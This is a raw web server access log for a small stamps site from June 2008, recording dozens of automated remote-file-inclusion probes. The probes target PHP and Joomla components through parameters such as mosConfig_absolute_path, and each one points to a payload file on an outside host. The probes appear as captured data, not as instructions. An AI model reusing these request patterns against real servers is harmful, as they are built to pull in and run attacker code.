87.22.37.144 - - [08/Jun/2008:18:06:33 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.32.96.7 - - [08/Jun/2008:18:11:26 -0700] "GET /logs/access_080512.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.32.96.7 - - [08/Jun/2008:18:11:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.32.96.7 - - [08/Jun/2008:18:11:27 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.55.227.178 - - [08/Jun/2008:18:25:08 -0700] "GET /logs/access_080512.log//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.55.227.178 - - [08/Jun/2008:18:25:08 -0700] "GET //index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.55.227.178 - - [08/Jun/2008:18:25:08 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.22.183 - - [08/Jun/2008:18:26:12 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.195.54.37 - - [08/Jun/2008:18:26:51 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
72.29.75.39 - - [08/Jun/2008:18:28:30 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.75.39 - - [08/Jun/2008:18:28:30 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.75.39 - - [08/Jun/2008:18:28:30 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.75.39 - - [08/Jun/2008:18:28:31 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.51.219.170 - - [08/Jun/2008:18:28:34 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
209.51.219.170 - - [08/Jun/2008:18:28:34 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
209.51.219.170 - - [08/Jun/2008:18:28:34 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.61.106.42 - - [08/Jun/2008:18:31:52 -0700] "GET /logs/access_080428.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.61.106.42 - - [08/Jun/2008:18:31:52 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.61.106.42 - - [08/Jun/2008:18:31:52 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.61.106.42 - - [08/Jun/2008:18:32:38 -0700] "GET /logs/access_080505.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
72.29.75.39 - - [08/Jun/2008:18:32:49 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.75.39 - - [08/Jun/2008:18:32:49 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.195.52.117 - - [08/Jun/2008:18:33:11 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
209.51.219.170 - - [08/Jun/2008:18:34:22 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.55.227.178 - - [08/Jun/2008:18:34:51 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.248.97.34 - - [08/Jun/2008:18:37:29 -0700] "GET /logs/access_080421.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.248.97.34 - - [08/Jun/2008:18:37:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.248.97.34 - - [08/Jun/2008:18:37:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.248.97.34 - - [08/Jun/2008:18:38:30 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:18:39:05 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:18:39:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:18:39:06 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.229.60.50 - - [08/Jun/2008:18:40:49 -0700] "GET /logs/access_080428.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
213.229.60.50 - - [08/Jun/2008:18:40:49 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
213.229.60.50 - - [08/Jun/2008:18:40:49 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
213.229.60.50 - - [08/Jun/2008:18:42:31 -0700] "GET /logs/access_080505.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:18:45:25 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:18:56:39 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:18:56:39 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:18:56:39 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:18:57:04 -0700] "GET /logs/access_080428.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:18:58:23 -0700] "GET /logs/access_080512.log//skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:18:58:23 -0700] "GET //skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:18:58:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:18:59:51 -0700] "GET /logs/access_080428.log//skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.249.3.71 - - [08/Jun/2008:19:00:46 -0700] "GET /logs/index.php?option=com_custompages&cpage=com_Team/index.php?option=com_custompages&cpage=http://tp.klokan.sk/help/css/hello.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:19:02:31 -0700] "GET /logs/access_080602.log HTTP/1.0" 200 4992477 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
201.6.121.78 - - [08/Jun/2008:19:04:48 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:19:09:11 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:19:09:20 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.32.68.226 - - [08/Jun/2008:19:10:39 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.32.68.226 - - [08/Jun/2008:19:10:39 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.32.68.226 - - [08/Jun/2008:19:10:39 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.32.68.226 - - [08/Jun/2008:19:10:45 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:19:12:26 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:19:12:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:19:12:31 -0700] "GET /logs/access_080519.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:19:12:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.186.117.208 - - [08/Jun/2008:19:12:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.203.222.50 - - [08/Jun/2008:19:16:02 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.203.222.50 - - [08/Jun/2008:19:16:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.203.222.50 - - [08/Jun/2008:19:16:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.203.222.50 - - [08/Jun/2008:19:16:03 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.203.222.50 - - [08/Jun/2008:19:16:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.203.222.50 - - [08/Jun/2008:19:16:04 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.67.20.50 - - [08/Jun/2008:19:22:55 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.mathstamps.com"
213.203.222.50 - - [08/Jun/2008:19:23:13 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.203.222.50 - - [08/Jun/2008:19:23:14 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:23:49 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:23:50 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:23:50 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:24:03 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:24:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:24:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:26:45 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:26:46 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:26:46 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
216.32.68.226 - - [08/Jun/2008:19:28:38 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.32.68.226 - - [08/Jun/2008:19:28:39 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
83.222.27.201 - - [08/Jun/2008:19:31:28 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.222.27.201 - - [08/Jun/2008:19:31:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.222.27.201 - - [08/Jun/2008:19:31:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:19:34:12 -0700] "GET /logs/access_080421.log//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:19:34:26 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:35:18 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:35:38 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:19:36:26 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.225.221.84 - - [08/Jun/2008:19:36:31 -0700] "GET /logs/access_080303.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.225.221.84 - - [08/Jun/2008:19:36:32 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.225.221.84 - - [08/Jun/2008:19:36:32 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.67.20.50 - - [08/Jun/2008:19:38:33 -0700] "GET //surveys/survey.inc.php?path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:19:42:09 -0700] "GET /logs/access_080512.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:19:57:10 -0700] "GET /logs/access_080317.log//head.php?css_path=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:19:57:10 -0700] "GET //head.php?css_path=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:19:57:11 -0700] "GET /logs//head.php?css_path=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:19:57:11 -0700] "GET /logs/access_080317.log//head.php?css_path=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:19:57:12 -0700] "GET //head.php?css_path=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.143.43.214 - - [08/Jun/2008:19:57:12 -0700] "GET /logs//head.php?css_path=http://legacyprinciples.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.225.221.84 - - [08/Jun/2008:19:59:51 -0700] "GET /logs/access_080505.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.71.234 - - [08/Jun/2008:20:12:25 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:26 -0700] "GET /logs/access_080519.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:26 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:26 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:29 -0700] "GET /logs/access_080512.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:35 -0700] "GET /logs/access_080519.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:36 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [08/Jun/2008:20:14:36 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
